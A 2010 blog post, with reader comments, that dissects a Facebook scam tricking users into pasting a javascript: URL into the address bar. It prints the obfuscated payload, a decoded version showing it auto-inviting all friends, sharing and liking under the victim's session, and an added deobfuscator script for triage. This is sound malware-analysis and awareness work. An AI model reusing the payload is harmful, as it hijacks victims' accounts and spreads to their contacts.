People need protection from themselves

It’s amazing how many people fall for scams and social engineering tricks on the internet. Some may remember the classic “I Love You” virus from the start of the century: it infected some 50 million users within a week or two. It was actually a very amateurish piece of malware except for one detail: social engineering. The mere name of the attachment was enough to entice people to open and execute the attached script. Fast forward ten years…

Ten years later, in 2010, computers are commonplace and one would expect people to be more computer-savvy. Yet today on Facebook I saw that lots of people had clicked on and executed a script from a page claiming to offer “The 9 Safest Ways to Have Unprotected Sex”. Over a quarter of a million Facebook users have fallen for this piece of social engineering. This one is relatively benign, but it is still social engineering that gets people to execute a script that could not otherwise run: a javascript: URL pasted into the address bar of a facebook.com page executes in that page’s origin, with the victim’s logged-in session, so the same-origin policy offers no protection at all against it.

The site tells visitors to copy a block of text to the clipboard and paste it into Internet Explorer’s address bar. The text is:

javascript:(function(){a='app110142809028483_jop';b='app110142809028483_jode';ifc='app110142809028483_ifc'; ifo='app110142809028483_ifo';mw='app110142809028483_mwrapper';var _0xa049=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x63\x6C\x69\x63\x6B","\x73\x75\x67\x67\x65\x73\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x73\x6C\x69\x6E\x6B","\x69\x6E\x70\x75\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x53\x68\x61\x72\x65","\x6C\x69\x6B\x65\x6D\x65"];d=document;d[_0xa049[2]](mw)[_0xa049[1]][_0xa049[0]]=_0xa049[3];d[_0xa049[2]](a)[_0xa049[4]]=d[_0xa049[2]](b)[_0xa049[5]];d[_0xa049[2]](_0xa049[7])[_0xa049[6]]();setTimeout(function (){fs[_0xa049[8]]();} ,5000);setTimeout(function (){SocialGraphManager[_0xa049[11]](_0xa049[9],_0xa049[10]);setTimeout(function (){d[_0xa049[2]](_0xa049[12])[_0xa049[6]]();setTimeout(function (){inp=document[_0xa049[14]](_0xa049[13]);for(i in inp){if(inp[i][_0xa049[5]]==_0xa049[15]){inp[i][_0xa049[6]]();} ;} ;setTimeout(function (){d[_0xa049[2]](_0xa049[16])[_0xa049[6]]();d[_0xa049[2]](ifo)[_0xa049[4]]=d[_0xa049[2]](ifc)[_0xa049[5]];} ,5000);} ,3000);} ,3000);} ,5000);})();


With the hex-escaped strings in the _0xa049 array decoded and substituted back in for each _0xa049[n] reference, it translates to:


javascript:(function(){
a='app110142809028483_jop';
b='app110142809028483_jode';
ifc='app110142809028483_ifc';
ifo='app110142809028483_ifo';
mw='app110142809028483_mwrapper';
d=document;
// Hide the app's wrapper element and replace the jop element's content
// with whatever is stored in the jode input.
d.getElementById(mw).style.visibility="hidden";
d.getElementById(a).innerHTML=d.getElementById(b).value;
// Open the "suggest to friends" dialog ...
d.getElementById("suggest").click();
// ... give it 5 s to load, then select everyone in the friend selector ...
setTimeout(function(){fs.select_all();},5000);
setTimeout(function(){
  // ... and submit the invitation form to all of them.
  SocialGraphManager.submitDialog("sgm_invite_form","/ajax/social_graph/invite_dialog.php");
  setTimeout(function(){
    // Open the share dialog, then press whichever input reads "Share".
    d.getElementById("slink").click();
    setTimeout(function(){
      inp=document.getElementsByTagName("input");
      // for-in also visits the collection's non-index properties; harmless here.
      for(i in inp){if(inp[i].value=="Share"){inp[i].click();}}
      setTimeout(function(){
        // Finally "like" the page and reveal the promised content
        // (the ifo element is filled from the hidden ifc input).
        d.getElementById("likeme").click();
        d.getElementById(ifo).innerHTML=d.getElementById(ifc).value;
      },5000);
    },3000);
  },3000);
},5000);
})();
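The translation above was done by hand. The decoding is mechanical, though, and the same “string table” trick (one array of hex-escaped literals, every string in the code replaced by an index into it) turns up in a lot of pasted payloads, so here is a small deobfuscator that does it for you. This is an added example and not code from the original post or from the scam page; its only input is the payload quoted above, copied verbatim with the blog’s curly quotes made straight. It assumes the shape seen here, a single var _0x…=[…]; table of double-quoted literals using \xNN and \uNNNN escapes, and deliberately fails loudly on anything it does not understand rather than emitting code that merely looks right.

```javascript
// Added example (not from the original post): mechanically perform the
// decoding the author did by hand. Targets the "string table" obfuscation used
// by this payload: a `var _0x....=[ "\x..", ... ];` array of hex-escaped
// literals, with every string in the code replaced by a table reference.
// Assumption: one table of double-quoted literals using \xNN / \uNNNN escapes,
// which is exactly the shape of the payload on this page.

// The payload from the post, verbatim apart from straightened quotes. String.raw
// keeps the \xNN sequences as literal text so that our decoder, not the
// JavaScript parser, is what turns them into characters.
const PAYLOAD =
  String.raw`javascript:(function(){a='app110142809028483_jop';b='app110142809028483_jode';ifc='app110142809028483_ifc'; ifo='app110142809028483_ifo';mw='app110142809028483_mwrapper';` +
  String.raw`var _0xa049=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x63\x6C\x69\x63\x6B","\x73\x75\x67\x67\x65\x73\x74",` +
  String.raw`"\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67",` +
  String.raw`"\x73\x6C\x69\x6E\x6B","\x69\x6E\x70\x75\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x53\x68\x61\x72\x65","\x6C\x69\x6B\x65\x6D\x65"];` +
  String.raw`d=document;d[_0xa049[2]](mw)[_0xa049[1]][_0xa049[0]]=_0xa049[3];d[_0xa049[2]](a)[_0xa049[4]]=d[_0xa049[2]](b)[_0xa049[5]];d[_0xa049[2]](_0xa049[7])[_0xa049[6]]();setTimeout(function (){fs[_0xa049[8]]();} ,5000);` +
  String.raw`setTimeout(function (){SocialGraphManager[_0xa049[11]](_0xa049[9],_0xa049[10]);setTimeout(function (){d[_0xa049[2]](_0xa049[12])[_0xa049[6]]();setTimeout(function (){inp=document[_0xa049[14]](_0xa049[13]);for(i in inp){if(inp[i][_0xa049[5]]==_0xa049[15]){inp[i][_0xa049[6]]();} ;} ;` +
  String.raw`setTimeout(function (){d[_0xa049[2]](_0xa049[16])[_0xa049[6]]();d[_0xa049[2]](ifo)[_0xa049[4]]=d[_0xa049[2]](ifc)[_0xa049[5]];} ,5000);} ,3000);} ,3000);} ,5000);})();`;

// Decode the two JavaScript escape forms this kind of obfuscator emits.
function decodeEscapes(literal) {
  return literal
    .replace(/\\u([0-9A-Fa-f]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\x([0-9A-Fa-f]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Step 1: locate the string table and decode every literal in it.
function extractStringTable(src) {
  const m = src.match(/var\s+(_0x[0-9A-Fa-f]+)\s*=\s*\[([^\]]*)\]\s*;/);
  if (!m) throw new Error("no _0x.... string table found");
  const [decl, name, body] = m;
  const table = [];
  const lit = /"((?:\\.|[^"\\])*)"/g;
  for (let s; (s = lit.exec(body)) !== null; ) table.push(decodeEscapes(s[1]));
  return { decl, name, table };
}

// Step 2: drop the table, put each decoded literal back where its reference
// was, and rewrite obj["ident"] as obj.ident for readability. A reference
// past the end of the table is an error rather than "undefined": continuing
// silently would produce code that looks right but is not.
function deobfuscate(src) {
  const { decl, name, table } = extractStringTable(src);
  const ref = new RegExp(name + "\\[(\\d+)\\]", "g");
  let code = src.replace(decl, "").replace(ref, (_, n) => {
    const i = Number(n);
    if (i >= table.length) throw new Error(`${name}[${n}] out of range`);
    return JSON.stringify(table[i]);
  });
  code = code.replace(/\["([A-Za-z_$][\w$]*)"\]/g, ".$1");
  return { table, code };
}

// Step 3: a minimal layout pass so the result reads like the listing above:
// break after each ';' or '{' and before each '}', indenting by brace depth.
// Not string-aware, which is acceptable here because none of the decoded
// literals contain ; { or }.
function layout(code) {
  const lines = [];
  let depth = 0;
  let cur = "";
  for (const ch of code) {
    if (ch === "}") {
      if (cur.trim()) lines.push("  ".repeat(depth) + cur.trim());
      depth = Math.max(0, depth - 1);
      cur = "}";
      continue;
    }
    cur += ch;
    if (ch === ";" || ch === "{") {
      lines.push("  ".repeat(depth) + cur.trim());
      cur = "";
      if (ch === "{") depth++;
    }
  }
  if (cur.trim()) lines.push("  ".repeat(depth) + cur.trim());
  return lines.join("\n");
}

const result = deobfuscate(PAYLOAD);
console.log(result.table);        // the 17 decoded strings, "visibility" ... "likeme"
console.log(layout(result.code)); // the readable form of the payload
```

The point of step 1 is that the table, not the code, carries all of the meaning: once its 17 entries are decoded (getElementById, click, submitDialog, /ajax/social_graph/invite_dialog.php, Share, likeme, …) the intent of the script is obvious even before the substitution pass, which is a useful triage shortcut when you are handed one of these and only want to know what it does.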


The nested setTimeout calls give each Facebook dialog a few seconds to load and then click its buttons programmatically: first the “suggest to friends” dialog, with every friend selected and the invitation submitted, then the share dialog and its “Share” button, then the page’s “like” button. The victim never explicitly clicks any of those submit buttons, yet every action goes through under their own logged-in session, because the pasted javascript: URL runs in the context of the facebook.com page they were viewing. That is also what makes it spread: each victim invites and shares it to all their friends, who then go through the same copy-and-paste routine.

It’s classic social engineering, and people still fall for it. Oh wait … it’s facebook 😉



2 Comments so far

  1.   bill on May 12th, 2010          

    in the above where it says BLOCKED SCRIPT that would read
    j a v a s c r i p t :
    without the spaces. My blog host doesn’t allow that kind of crap 😉

  2.   Mike on July 6th, 2010          

    Good post! Found another one, “99% of people can’t watch this video more than 25 seconds”. Has over HALF A MILLION ‘likes’. Same code, as far as I can tell (I’m not this kind of programmer, but the request to cut&paste java script, and the embedded hex chars caught my eye).

    Unfortunately, FB is pretty weak in real security. We’re not far from the point where the bad people figure out how to hijack everything without asking you to cut&paste…